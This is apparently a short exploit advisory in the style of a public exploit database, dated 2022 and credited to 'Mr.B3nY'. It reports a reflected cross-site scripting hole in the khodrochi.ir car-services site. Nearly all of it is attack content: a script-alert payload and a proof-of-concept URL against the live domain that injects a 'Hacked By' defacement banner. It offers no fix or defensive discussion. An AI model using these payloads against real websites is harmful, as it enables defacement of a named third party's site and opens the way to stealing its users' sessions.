========================================================= # Exploit Title: Khodrochi.ir CMS - Iranian Car Services Platform - XSS # Google Dork: - # Date: 2022-05-27 # Exploit Author: Mr.B3nY # Vendor Homepage: www.khodrochi.ir # Tested on: Parrot OS # Vulnerability : Cross Site Scripting (XSS) ========================================================= [+] PAYLOAD : "<script>alert("XSS BY Mr.B3nY")</script> ========================================================= [+] POC :- https://khodrochi.ir/specification/report.php?q="<p style="text-align:center;font-size:5rem">Hacked By Mr.B3nY</p><!-- =========================================================